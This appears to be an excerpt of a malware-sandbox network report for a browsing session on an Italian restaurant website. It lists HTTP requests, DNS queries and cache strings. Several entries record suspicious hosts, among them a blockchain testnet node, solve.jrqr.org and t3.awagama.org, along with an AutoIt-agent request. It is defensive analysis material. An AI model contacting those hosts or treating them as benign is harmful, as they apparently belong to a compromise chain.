    Source: global trafficHTTP traffic detected: GET /it.08db2cd122d5f99494dd.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cz.5a24757d105fbe7a4e81.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /nl.cfe72ae0b3d6d8485234.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gb.516897fd3988e35032b7.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ru.7e04b988972d41f5c369.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /es.e3db1b5f8a2ec8ae8764.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pt.96475126e7232ee3558e.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /open/getFormsAuthV2/?hashform=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v4/ordini/getProfilo/?cod_univoco=47667869&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://forms.pienissimo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hr.89b8c8af46eef412f1cd.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/js/main.js?_=1735922053693 HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /it.08db2cd122d5f99494dd.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gb.516897fd3988e35032b7.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pt.96475126e7232ee3558e.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fa-solid-900.9ef50a04ef2ee9703d69.woff2 HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.pienissimo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Flaticon.646ed006079ab0b728f1.woff2 HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.pienissimo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v4/ordini/getFormInfo?cod_univoco=47667869&id=Fl7E3J&type=formprenotazione&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://forms.pienissimo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v4/ordini/getProfilo/?cod_univoco=47667869&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /es.e3db1b5f8a2ec8ae8764.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/js/main.js?_=1735922053694 HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/info-clientAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /clientslogo/user_253_uzuypfb7d33r7lvcjvw37oharuqxwlgk.png HTTP/1.1Host: pienissimo.s3.eu-central-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v4/ordini/getFormInfo?cod_univoco=47667869&id=Fl7E3J&type=formprenotazione&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/js/main.js?_=1735922053694 HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /clientslogo/user_253_uzuypfb7d33r7lvcjvw37oharuqxwlgk.png HTTP/1.1Host: pienissimo.s3.eu-central-1.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /learning/access-management/phishing-attack/ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: https://t3.awagama.org/mima.mp4Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.cloudflare.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fc465e5fae2de96 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.cloudflare.com/learning/access-management/phishing-attack/Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.cloudflare.comConnection: Keep-AliveCookie: __cf_bm=IEKqWkBvJ81FFGXO0YfR.NrgUiBh94QG8VP81NS9wEg-1735922084-1.0.1.1-gYffxH0z1tJ4cOLayeRJHnN7bp2dPLZlndT1YxLY9Utj.d_HuzxhWIk5_e8OHXTz.qjP8To3SgvLp81yjooK6JJ23elglQnMIOzXKCV_c0s
    Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.cloudflare.com/learning/access-management/phishing-attack/Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoOrigin: https://www.cloudflare.comAccept-Encoding: gzip, deflateHost: static.cloudflareinsights.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /learning/favicon.ico HTTP/1.1User-Agent: AutoItHost: www.cloudflare.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: chromecache_612.1.dr, chromecache_493.1.drString found in binary or memory: src: '//www.youtube.com/embed/%id%' equals www.youtube.com (Youtube)
    Source: chromecache_644.1.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/federicaalimenti85/" /> equals www.facebook.com (Facebook)
    Source: chromecache_535.1.dr, chromecache_381.1.drString found in binary or memory: youtube : {loaded: false, src: 'https://www.youtube.com/iframe_api' } equals www.youtube.com (Youtube)
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
    Source: 000003.log6.21.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
    Source: 000003.log6.21.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
    Source: 000003.log6.21.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
    Source: chromecache_644.1.drString found in binary or memory: .","breadcrumb":{"@id":"https://www.cipassoitalia.it/vineria-e-bistrot-al-centro-di-roma-2/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https://www.cipassoitalia.it/vineria-e-bistrot-al-centro-di-roma-2/"]}]},{"@type":"BreadcrumbList","@id":"https://www.cipassoitalia.it/vineria-e-bistrot-al-centro-di-roma-2/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home"}]},{"@type":"WebSite","@id":"https://www.cipassoitalia.it/#website","url":"https://www.cipassoitalia.it/","name":"CIPASSO","description":"&quot;CiPASSO e me ne innamoro&quot;","publisher":{"@id":"https://www.cipassoitalia.it/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.cipassoitalia.it/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https://www.cipassoitalia.it/#organization","name":"CiPASSO","url":"https://www.cipassoitalia.it/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https://www.cipassoitalia.it/#/schema/logo/image/","url":"https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600.png","contentUrl":"https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600.png","width":600,"height":285,"caption":"CiPASSO"},"image":{"@id":"https://www.cipassoitalia.it/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/federicaalimenti85/","https://www.instagram.com/come_io_mi_voglio/"]}]}</script> equals www.facebook.com (Facebook)
    Source: msapplication.xml1.14.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x50476fa0,0x01db5dfd</date><accdate>0x50476fa0,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
    Source: msapplication.xml6.14.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x504c51b1,0x01db5dfd</date><accdate>0x504c51b1,0x01db5dfd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
    Source: chromecache_624.1.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(b){var c=typeof a.URL==="function"?a.URL:a.webkitURL;c=new c(b);c=c.hostname.endsWith(".facebook.com")&&c.pathname=="/signals/iwl.js";if(!c)throw new Error("Disallowed script URL");return b}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_624.1.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_624.1.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: www.cipassoitalia.it
    Source: global trafficDNS traffic detected: DNS query: s.w.org
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.bnbchain.org
    Source: global trafficDNS traffic detected: DNS query: _8545._https.data-seed-prebsc-1-s1.bnbchain.org
    Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
    Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
    Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
    Source: global trafficDNS traffic detected: DNS query: solve.jrqr.org
    Source: global trafficDNS traffic detected: DNS query: t3.awagama.org
    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: forms.pienissimo.com
    Source: global trafficDNS traffic detected: DNS query: unpkg.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
    Source: global trafficDNS traffic detected: DNS query: enginev2.pienissimo.com
    Source: global trafficDNS traffic detected: DNS query: pienissimo.s3.eu-central-1.amazonaws.com
    Source: global trafficDNS traffic detected: DNS query: www.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
    Source: unknownHTTP traffic detected: POST /watch/99162160/1?page-url=goal%3A%2F%2Fwww.cipassoitalia.it%2FClick&page-ref=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&hittoken=1735921987_de4791d74275a7a2a61e0f539a567fed3f958a917b537649694aaeea58b3a8b6&browser-info=ar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A3%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113306%3Aet%3A1735921987%3Ac%3A1%3Arn%3A689669015%3Arqn%3A2%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921987%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr(14)mc(g-1)clc(0-0-0)rqnt(2)aw(1)rcm(1)cdl(na)eco(42009088)ti(0)&force-urlencoded=1&site-info=%7B%22clientID%22%3A%2221187cdf-b91f-4f27-aae8-45cec9395e7c%22%7D HTTP/1.1Host: mc.yandex.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.cipassoitalia.itSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 16:33:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 8fc463e87adf7d14-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 16:33:39 GMTContent-Type: text/htmlContent-Length: 151Connection: closeServer: cloudflareCF-RAY: 8fc4644d79e58c41-EWRX-Frame-Options: DENYX-Content-Type-Options: nosniff
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 Jan 2025 16:33:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICServer: cloudflareCF-RAY: 8fc46453f8108c05-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1808&rtt_var=712&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2863&recv_bytes=709&delivery_rate=1500513&cwnd=215&unsent_bytes=0&cid=77cdec241fe87427&ts=596&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Jan 2025 16:33:59 GMTContent-Type: text/htmlContent-Length: 553Connection: closeServer: cloudflareCF-RAY: 8fc464c7de1c43a9-EWRX-Frame-Options: DENYX-Content-Type-Options: nosniff
